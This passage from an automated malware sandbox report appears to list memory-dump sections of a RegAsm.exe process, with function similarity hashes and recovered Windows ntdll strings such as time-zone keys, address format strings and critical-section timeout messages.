                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                  • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                  • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                  • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                  • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                  • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                  • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                  • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                  • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                  • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                  • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                  • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                  • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                  APIs
                  Strings
                  • Kernel-MUI-Language-Allowed, xrefs: 023B8827
                  • WindowsExcludedProcs, xrefs: 023B87C1
                  • Kernel-MUI-Language-SKU, xrefs: 023B89FC
                  • Kernel-MUI-Number-Allowed, xrefs: 023B87E6
                  • Kernel-MUI-Language-Disallowed, xrefs: 023B8914
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: _wcspbrk
                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                  • API String ID: 402402107-258546922
                  • Opcode ID: 4ed419bf6994e13974859bcd3e96bf17b5c25f6688ae9beb92250a8f72667201
                  • Instruction ID: ca34e88815e61699b71badd0aacec4f25313bfd5ceb593a0edfb78a82f13781a
                  • Opcode Fuzzy Hash: 4ed419bf6994e13974859bcd3e96bf17b5c25f6688ae9beb92250a8f72667201
                  • Instruction Fuzzy Hash: 6AF1E8B2D00209EFDF22DFA9C9809EEB7B9FF09304F14446AE605A7651E7349A45DF60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: _wcsnlen
                  • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                  • API String ID: 3628947076-1387797911
                  • Opcode ID: 836e7d717090ab8025fe6f534f1ff6b2080d1a4d2dbb5b23a5caf739062a0c78
                  • Instruction ID: f0b0aca8a373f69d03cc30532742fe920f664d1d974a326b3720d9c8ddbdd126
                  • Opcode Fuzzy Hash: 836e7d717090ab8025fe6f534f1ff6b2080d1a4d2dbb5b23a5caf739062a0c78
                  • Instruction Fuzzy Hash: 7E419471240238BAFB129AA3CD81FEFB76D9F04744F504127FA05D9190D7B1EA588BB4
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 89435fddfa545b7862a9d3adc0564e9d5f7af5f0b66704f7e3829b98bf929920
                  • Instruction ID: c2b0a28e7b65d2240265ed281e116424fb07b4ef4c7d3c1211102ee333cd488d
                  • Opcode Fuzzy Hash: 89435fddfa545b7862a9d3adc0564e9d5f7af5f0b66704f7e3829b98bf929920
                  • Instruction Fuzzy Hash: C36127B2E00655ABDF34DFA9D8809BFBBBAEF85300754C12EE9DA47541D334A640CB60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 28ed2b474f68e8a384560c831fb0ebc660d0c4512e829f8cd4203a91688dd6dd
                  • Instruction ID: 091e5fdb81620da165428a3ad289209e3decd07cc9a11394950682bc2a908608
                  • Opcode Fuzzy Hash: 28ed2b474f68e8a384560c831fb0ebc660d0c4512e829f8cd4203a91688dd6dd
                  • Instruction Fuzzy Hash: 26619076904648AEDF21DF59C8405BE7FF5EF59215B14C5ABF8A987200E334EA81CB90
                  APIs
                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 023E3F12
                  Strings
                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 023EE2FB
                  • Execute=1, xrefs: 023E3F5E
                  • ExecuteOptions, xrefs: 023E3F04
                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 023EE345
                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 023E3EC4
                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 023E3F4A
                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 023E3F75
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: BaseDataModuleQuery
                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                  • API String ID: 3901378454-484625025
                  • Opcode ID: fccc9b55a97f6f55f0e02afb84a0c32fed81ddd5aaebd427d0e12a52ebb64a41
                  • Instruction ID: ed16691e0b9c24cb53d4e1790f3e6f74a71fc370293d2b728b313adaa8f7c7a7
                  • Opcode Fuzzy Hash: fccc9b55a97f6f55f0e02afb84a0c32fed81ddd5aaebd427d0e12a52ebb64a41
                  • Instruction Fuzzy Hash: 7941CA7268071C7AEF30DAA4DCC5FEBB3BDAB15704F1004A9E906E6181E770DA498F61
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: __fassign
                  • String ID: .$:$:
                  • API String ID: 3965848254-2308638275
                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                  • Instruction ID: 7a8c7b2c0f8e18a955f5a67dc519c31553e04fcd02afac1e1ee18c5d5b29cf20
                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                  • Instruction Fuzzy Hash: 51A1AF72D0420ADFCF28CF64E8457FEB7B9EF45B08F24886AD852AB251D7309649CB51
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023F2206
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-4236105082
                  • Opcode ID: fc76838219d53a557de8ac523783fdad34fa202c05613213f3c86de0ad649ee8
                  • Instruction ID: 7bd2697c4c439f6a53baf684d1c21640f89f099b7d5de3074e807043ef644491
                  • Opcode Fuzzy Hash: fc76838219d53a557de8ac523783fdad34fa202c05613213f3c86de0ad649ee8
                  • Instruction Fuzzy Hash: 54516B31700311AFEF65CA18EC81FA733AAAF84714F218259FE15DB381DA71EC428B90
                  APIs
                  • ___swprintf_l.LIBCMT ref: 023FEA22
                    • Part of subcall function 023D13CB: ___swprintf_l.LIBCMT ref: 023D146B
                    • Part of subcall function 023D13CB: ___swprintf_l.LIBCMT ref: 023D1490
                  • ___swprintf_l.LIBCMT ref: 023D156D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$]:%u
                  • API String ID: 48624451-3050659472
                  • Opcode ID: e7aefb095ab8004032baac0f69ee36e561c2abb5eb0feebd338a4f02ff9b4b71
                  • Instruction ID: a2875271ea7575b2cc6b65ec09e7f5e6e737653f76c49bec6c9973e04acba483
                  • Opcode Fuzzy Hash: e7aefb095ab8004032baac0f69ee36e561c2abb5eb0feebd338a4f02ff9b4b71
                  • Instruction Fuzzy Hash: 932195739002199BDF20DE68EC40AEA77BDAB10704F444566ED8AD3140DB75EA58CFE1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$]:%u
                  • API String ID: 48624451-3050659472
                  • Opcode ID: 67ee22a27f56a7639b70b4c9f3b211d18855dff5cb8dc69ffca6a83487e0cdd4
                  • Instruction ID: 561540e842bd98f01bb3b2e7eaaaa09b6207db943a0587498a306f6910b03568
                  • Opcode Fuzzy Hash: 67ee22a27f56a7639b70b4c9f3b211d18855dff5cb8dc69ffca6a83487e0cdd4
                  • Instruction Fuzzy Hash: EC21B37290021AABEB21AE65CC45AEF7BEDDF18714F040566FC0597240E7749A44CBE1
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023F22F4
                  Strings
                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023F22FC
                  • RTL: Re-Waiting, xrefs: 023F2328
                  • RTL: Resource at %p, xrefs: 023F230B
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-871070163
                  • Opcode ID: 53fea3e0dab07b3629bd6896e3d35d0717a1803bf8b9042eb5f49b3489cb4d42
                  • Instruction ID: 7b6b4eab337d33e0e2737e9a7538ceb9d7b0a8f697cc8a08a03c4a915c61e361
                  • Opcode Fuzzy Hash: 53fea3e0dab07b3629bd6896e3d35d0717a1803bf8b9042eb5f49b3489cb4d42
                  • Instruction Fuzzy Hash: 0D51E671601715ABEB619F68DC80FA773A9AF44324F104259FE09DB780E771E8468B90
                  Strings
                  • RTL: Re-Waiting, xrefs: 023F24FA
                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023F24BD
                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 023F248D
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                  • API String ID: 0-3177188983
                  • Opcode ID: 7816b595808c3370cad322c74d866344e8a92094b6d4ff897033e60573083bd5
                  • Instruction ID: 6391b6fac6ca7440c9b9051c49f3d43f0af403f910edc8336871d1992c8f960b
                  • Opcode Fuzzy Hash: 7816b595808c3370cad322c74d866344e8a92094b6d4ff897033e60573083bd5
                  • Instruction Fuzzy Hash: 8041C2B0600204ABDB20DF68DC85FAB77A9EF45320F108605FA699B6D1D774E941CB61
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: __fassign
                  • String ID:
                  • API String ID: 3965848254-0
                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                  • Instruction ID: a67952ede27e6ca1850c6af3e676258e954f18e73ab40bb269cdcae2263634d8
                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                  • Instruction Fuzzy Hash: 51918C71D0020AEFDF24DFA8C8457AEB7B6EB45709F30846FD405A6692E7309E41CB91
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
